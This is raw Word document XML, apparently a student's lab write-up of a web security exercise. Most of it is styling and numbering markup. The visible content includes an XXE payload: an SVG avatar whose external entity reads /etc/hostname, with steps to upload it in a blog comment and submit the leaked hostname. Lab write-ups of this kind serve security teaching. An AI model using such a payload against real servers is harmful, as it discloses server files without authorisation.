          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0" standalone="yes"?&gt;&lt;!DOCTYPE test [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///etc/hostname" </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> width="128px" height="128px" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xmlns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">="http://www.w3.org/2000/svg" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xmlns:xlink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>="http://www.w3.org/1999/xlink" version="1.1"&gt;&lt;text font-size="16" x="0" y="16"&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>;&lt;/text&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4691C08F" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve">Post a comment on a blog </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>post, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> upload this image as an avatar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609502EB" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>When you view your comment, you should see the contents of the /etc/hostname file in your image. Use the "Submit solution" button to submit the value of the server hostname.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A75D87E" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A"/>
    <w:sectPr w:rsidR="001E336A" w:rsidSect="00D22C6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87EE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6F81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122B51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B88CCD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B917E2B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="106E9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C279B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A16633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E1F5FE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10FA9C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1856102"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F36B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CE0789"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="912A6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800003"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37A63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932C70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2336218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5C82803"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89F02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BB0651"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22A8F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434013"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A9AA8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707608"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C284B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9B4C56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D8C2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731B95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD1C3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D628A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1226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392F66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39AC0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CE9584A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC6EA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AB3BB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABA6B2D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EF6786F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3594F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9717B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE74C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3D15EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4308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E23771"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D108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826C95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8B81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B00BDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14206F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2727C07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D58AC51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6A021FDF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8701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5200EE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3AE8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4E0F66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E12CEC4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768C3689"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B39AA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EE3FC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B94C5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3F126A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57FE1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F8B4F86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1ECCD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88168538">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1357387949">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="246305234">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1380084463">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1285192626">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="467818186">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1932229732">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1830635297">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1562326569">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1026902677">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="50619823">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1874225440">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1746800016">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1382054670">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="594674574">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="317345232">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1152789669">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="864909294">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="475033192">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1734087274">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="788935975">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1104423790">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1240290851">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="173417940">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1685477952">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1276669874">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="438985149">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1132403820">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="879048585">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="513687596">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1298606392">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1027217653">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="43633916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D50877"/>
    <w:rsid w:val="000A6040"/>
    <w:rsid w:val="001E336A"/>
    <w:rsid w:val="005B19D0"/>
    <w:rsid w:val="00720AD1"/>
    <w:rsid w:val="00A85D3B"/>
    <w:rsid w:val="00AA7C8C"/>
    <w:rsid w:val="00B1101F"/>
    <w:rsid w:val="00D22C66"/>
    <w:rsid w:val="00D50877"/>
    <w:rsid w:val="00F901C8"/>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ACE93"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B79DD336-C3D4-48FD-8269-BDDE1FF88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087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5087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5087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5087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5087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508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508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508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508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087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5087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5087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5087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5087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508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508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508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50877"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D508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08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08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508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0877"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00D50877"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D50877"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D50877"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00D5087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50877"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00D50877"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E336A"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E336A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B19D0"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="005B19D0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B19D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rtswigger.net/burp/documentation/desktop/tools/collaborator"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8</Pages>
  <Words>1933</Words>
  <Characters>11019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Nazlıcan Özen (Student)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nazlıcan Özen (Student)</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-07T13:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-18T20:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>